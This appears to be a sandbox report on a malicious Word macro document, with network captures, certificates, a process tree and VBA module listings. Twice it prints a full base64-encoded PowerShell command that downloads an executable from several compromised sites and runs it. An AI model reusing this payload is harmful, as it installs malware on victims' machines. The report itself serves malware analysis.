                                Data Ascii: 58b2<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://blockchainjoblist.com/px.js?ch=1"></script><script type="text/javascript" src="http://blockchainjoblist.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://blockchainjoblist.com/sk-logabpstatus.php?a=OUYxY2s4RndLc0RVbkQxazhBbjBCNHgxeEpxWFRUTXh1V1U4SCtRZ1lxVXJSMWx1QVIxUllQSVdVTjBtMjdUZkhKY05LQ0IzbzdRSnJwYWtEc08vWUNXaGlLS1FQeDhQOEltUm80NHFxU1k9&b="+abp;document.body.appendChild(imglog);
                                Dec 4, 2020 10:57:14.142617941 CET158INData Raw: 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63
                                Data Ascii: if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='blockchainjoblist.com' d='entity_mapped'" /><title>Blockchainjoblist.com</title><meta ht
                                Dec 4, 2020 10:57:14.142657995 CET160INData Raw: 70 65 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 32 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 75 62 75 6e 74 75 2d 62 2f 75 62 75 6e 74 75 2d 62 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28
                                Data Ascii: pe"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff") format("woff"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2") format("woff2"),url("http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
                                Dec 4, 2020 10:57:14.142697096 CET161INData Raw: 6c 61 72 2d 73 65 61 72 63 68 65 73 7b 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 32 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 32 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69
                                Data Ascii: lar-searches{padding: 40px 25px 5px;background: url(http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg) no-repeat center center;background-size: cover}.popular-searches ul.first{ list-style: none;width: 380px;margin:0 auto;}.popular-se
                                Dec 4, 2020 10:57:14.142735004 CET163INData Raw: 64 74 68 3a 20 35 30 25 3b 7d 0d 0a 2e 77 65 62 73 69 74 65 20 61 7b 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 66
                                Data Ascii: dth: 50%;}.website a{word-wrap: break-word;font-size: 24px;color: #ffffff;font-family: Arial, Helvetica, sans-serif; display:block;background:url(http://i2.cdn-image.com/__media__/pics/12471/logo.png) no-repeat left center; font-weight: bold
                                Dec 4, 2020 10:57:14.142785072 CET164INData Raw: 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 7d 0d 0a 0d 0a 2e 73 72 63 68 42 74 6e 20 7b 62
                                Data Ascii: order-radius:0;-moz-border-radius:0;border-radius:0;color: #ffffff}.srchBtn {background: #22528a url(http://i2.cdn-image.com/__media__/pics/12471/search-icon.png) no-repeat center center; border: none; color: #fff; cursor: pointer; float:
                                Dec 4, 2020 10:57:14.142827034 CET165INData Raw: 74 68 3a 20 39 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 6c 69 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b
                                Data Ascii: th: 90%!important;padding-bottom: 30px}.popular-searches li {margin-bottom: 0px;margin-top: 15px}div.search-form{width: 300px} .srchTxt{width: 250px;font-size: 16px;line-height: 20px} .website .domain{font-size: 23px;padding-top:
                                Dec 4, 2020 10:57:14.142869949 CET167INData Raw: 6f 72 6d 7b 77 69 64 74 68 3a 20 32 35 30 70 78 7d 0d 0a 20 20 20 20 2e 77 65 62 73 69 74 65 7b 6d 61 78 2d 77 69 64 74 68 3a 20 39 35 25 3b 7d 0d 0a 20 20 20 20 2e 73 72 63 68 54 78 74 7b 77 69 64 74 68 3a 20 32 30 30 70 78 3b 66 6f 6e 74 2d 73
                                Data Ascii: orm{width: 250px} .website{max-width: 95%;} .srchTxt{width: 200px;font-size: 16px;line-height: 20px} }.content-container{background: none !important}.main-container{border:none !important;height: auto !important}.header{
                                Dec 4, 2020 10:57:14.194467068 CET168INData Raw: 20 20 61 7b 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53
                                Data Ascii: a{word-wrap: break-word;} </style><![endif]--><script language="JavaScript" type="text/javascript" src="http://i2.cdn-image.com/__media__/js/min.js?v2.2"></script></head><body onload="" onunload="" onBeforeUnload=""><div sty
                                Dec 4, 2020 10:57:14.279783964 CET171INData Raw: 22 20 20 20 6e 61 6d 65 3d 22 73 65 61 72 63 68 66 6f 72 6d 31 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 62 6c 6f 63
                                Data Ascii: " name="searchform1" style="visibility:hidden;display:none;" action="http://blockchainjoblist.com/display.cfm" method="get" target="_top" onsubmit="showPop=0;" > <input name="s" type="text" onClic
                                Dec 4, 2020 10:57:14.279810905 CET172INData Raw: 6a 6f 62 6c 69 73 74 2e 63 6f 6d 2f 44 65 6e 74 61 6c 5f 50 6c 61 6e 73 2e 63 66 6d 3f 66 70 3d 55 4e 70 39 4b 75 46 50 41 63 43 54 65 6e 45 61 36 69 74 52 4a 61 39 31 33 63 63 36 30 4d 65 41 38 32 30 31 4b 46 38 44 4a 67 50 4b 7a 76 54 6e 6f 67
                                Data Ascii: joblist.com/Dental_Plans.cfm?fp=UNp9KuFPAcCTenEa6itRJa913cc60MeA8201KF8DJgPKzvTnog4N6j0iulSxKcEJw%2BiCpd6YFtQilX605EfeX6%2BhbzquPifmsc8q7k4c7xyUCLFhvTbsNc9qAeCJr%2FvYmZtOK1tuZu1aARdnKkJJI9WI8DNL0L07lVOXTVJ%2FIe2m6v41Tr%2BSpLboMntHCrgs0a0gVkh2N


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.34971513.248.148.25480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampkBytes transferredDirectionData
                                Dec 4, 2020 10:57:17.512826920 CET212OUTGET /upload/41830/ HTTP/1.1
                                Host: ww38.yeuquynhnhai.com
                                Connection: Keep-Alive
                                Dec 4, 2020 10:57:17.651443958 CET213INHTTP/1.1 403 Forbidden
                                Date: Fri, 04 Dec 2020 09:57:17 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: keep-alive
                                Server: nginx
                                Vary: Accept-Encoding
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                HTTPS Packets

                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                Dec 4, 2020 10:57:16.284099102 CET172.67.180.202443192.168.2.349713CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESat Jul 11 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sun Jul 11 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                Dec 4, 2020 10:57:16.898741961 CET103.224.212.219443192.168.2.349714CN=milanpetrovic.me CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Dec 01 00:14:12 CET 2020 Thu Mar 17 17:40:46 CET 2016Mon Mar 01 00:14:12 CET 2021 Wed Mar 17 17:40:46 CET 2021769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021
                                Dec 4, 2020 10:57:17.995949984 CET173.198.248.218443192.168.2.349716CN=deepikarai.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Nov 25 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Wed Feb 24 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                Dec 4, 2020 10:57:18.535352945 CET173.198.248.218443192.168.2.349717CN=deepikarai.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Nov 25 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Wed Feb 24 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: WINWORD.EXE PID: 5776 Parent PID: 792

                                General

                                Start time:10:57:03
                                Start date:04/12/2020
                                Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                Wow64 process (32bit):true
                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                Imagebase:0xc90000
                                File size:1937688 bytes
                                MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: splwow64.exe PID: 4812 Parent PID: 5776

                                General

                                Start time:10:57:07
                                Start date:04/12/2020
                                Path:C:\Windows\splwow64.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\splwow64.exe 12288
                                Imagebase:0x7ff766af0000
                                File size:130560 bytes
                                MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: powershell.exe PID: 5596 Parent PID: 4940

                                General

                                Start time:10:57:10
                                Start date:04/12/2020
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
                                Imagebase:0x7ff785e30000
                                File size:447488 bytes
                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 2148 Parent PID: 5596

                                General

                                Start time:10:57:10
                                Start date:04/12/2020
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b2800000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                VBA Code

                                Call Graph

                                Graph

                                Module: BdOW1qt

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "BdOW1qt"

                                Module: EELFLr

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "EELFLr"

                                Module: EIBYN39s

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "EIBYN39s"

                                Module: S9zlQCC

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "S9zlQCC"

                                2

                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = False

                                6

                                Attribute VB_Exposed = False

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = False

                                Module: ThisDocument

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "ThisDocument"

                                2

                                Attribute VB_Base = "1Normal.ThisDocument"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = True

                                8

                                Attribute VB_Customizable = True

                                9

                                Attribute VB_Control = "CvKRtZM, 0, 0, MSForms, OptionButton"

                                10

                                Attribute VB_Control = "Iw5R1M, 1, 1, MSForms, OptionButton"

                                11

                                Attribute VB_Control = "hjL90Njk, 2, 2, MSForms, OptionButton"

                                12

                                Attribute VB_Control = "nEKQItFh, 3, 3, MSForms, OptionButton"

                                13

                                Attribute VB_Control = "Mdw60aL, 4, 4, MSForms, OptionButton"

                                14

                                Attribute VB_Control = "psYO9m, 5, 5, MSForms, OptionButton"

                                15

                                Attribute VB_Control = "pBDzuJEX, 6, 6, MSForms, OptionButton"

                                16

                                Attribute VB_Control = "rFuFtC, 7, 7, MSForms, OptionButton"

                                17

                                Attribute VB_Control = "McQHX3, 8, 8, MSForms, OptionButton"

                                18

                                Attribute VB_Control = "YWLoCv, 9, 9, MSForms, OptionButton"

                                19

                                Attribute VB_Control = "PWo3kW, 10, 10, MSForms, OptionButton"

                                20

                                Attribute VB_Control = "IjuWPtT, 11, 11, MSForms, OptionButton"

                                Module: TrS1jk

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "TrS1jk"

                                Module: Uq3XXQaF

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "Uq3XXQaF"

                                Module: V9sPZLU

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "V9sPZLU"

                                2

                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = False

                                6

                                Attribute VB_Exposed = False

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = False

                                Module: pGv5GKCO

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "pGv5GKCO"

                                Executed Functions
                                Function vzVjQz, APIs: 371, Strings: 3, Number of lines: 48, Relevance: 663.298
                                APIsMeta Information

                                YVZLjB85

                                Rnd

                                Cos

                                UJ4Vqfvr

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                zTDlnFW

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                TlEu4dn

                                CByte

                                fYSpVZg

                                oWbX

                                bWzdfi7

                                zqzYlm3

                                McQHX3

                                PWo3kW

                                psYO9m

                                UR1S3b

                                bE0j9Ui5

                                Rnd

                                Cos

                                GLiWOi_

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                nw28atwu

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                wdFzjT

                                CByte

                                fYSpVZg

                                oWbX

                                rN2MG_

                                uUBMaP

                                Rnd

                                Cos

                                fHOdUi

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                YMtfHC

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                FoWIAw

                                CByte

                                fYSpVZg

                                oWbX

                                zwuF49r

                                Create

                                		SWbemObjectEx.Create("powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=",,,) -> 0

                                IEHlwRq

                                W8KjQY

                                Part of subcall function u0rrBWd@zacGkX9: UvwY_w2

                                Part of subcall function u0rrBWd@zacGkX9: Rnd

                                Part of subcall function u0rrBWd@zacGkX9: Cos

                                Part of subcall function u0rrBWd@zacGkX9: REjNZU

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: DMkD685A

                                Part of subcall function u0rrBWd@zacGkX9: WtgzQ71y4

                                Part of subcall function u0rrBWd@zacGkX9: xMfau5248

                                Part of subcall function u0rrBWd@zacGkX9: ChrB

                                Part of subcall function u0rrBWd@zacGkX9: pvOb

                                Part of subcall function u0rrBWd@zacGkX9: Round

                                Part of subcall function u0rrBWd@zacGkX9: npy

                                Part of subcall function u0rrBWd@zacGkX9: KYoI8IEt

                                Part of subcall function u0rrBWd@zacGkX9: oZgH7909

